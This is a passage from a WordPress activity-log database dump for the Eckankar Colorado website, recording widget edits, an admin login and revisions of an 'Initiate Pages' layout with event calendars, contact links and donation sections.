color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231502,39177,'setting_new_value','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231503,39177,'control_id','widget_custom_html[6]'),(231504,39177,'control_label','Custom HTML'),(231505,39177,'control_type','widget_form'),(231506,39177,'_message_key','appearance_customized'),(231507,39177,'_user_id','2'),(231508,39177,'_user_login','S8zhaBda'),(231509,39177,'_user_email','nada@zipnadanot.org'),(231510,39177,'_server_remote_addr','76.130.120.x'),(231511,39177,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(231512,39178,'widget_id_base','custom_html'),(231513,39178,'widget_name_translated','Custom HTML'),(231514,39178,'sidebar_id','null'),(231515,39178,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231516,39178,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231517,39178,'_message_key','widget_edited'),(231518,39178,'_user_id','2'),(231519,39178,'_user_login','S8zhaBda'),(231520,39178,'_user_email','nada@zipnadanot.org'),(231521,39178,'_server_remote_addr','76.130.120.x'),(231522,39178,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(231523,39179,'user_id','2'),(231524,39179,'user_email','nada@zipnadanot.org'),(231525,39179,'user_login','S8zhaBda'),(231526,39179,'_user_id','2'),(231527,39179,'_user_login','S8zhaBda'),(231528,39179,'_user_email','nada@zipnadanot.org'),(231529,39179,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(231530,39179,'_message_key','user_logged_in'),(231531,39179,'_server_remote_addr','76.130.120.x'),(231532,39179,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?interim-login=1&wp_lang=en_US'),(231533,39180,'post_id','68102'),(231534,39180,'post_type','page'),(231535,39180,'post_title','Initiate Page'),(231536,39180,'post_prev_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.16), rgba(255, 255, 255, 0.16)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.16)\" data-bg-overlaycolor-alpha=\"0.16\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231537,39180,'post_new_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.18), rgba(255, 255, 255, 0.18)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255,255,255,0.18)\" data-bg-overlaycolor-alpha=\"0.18\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 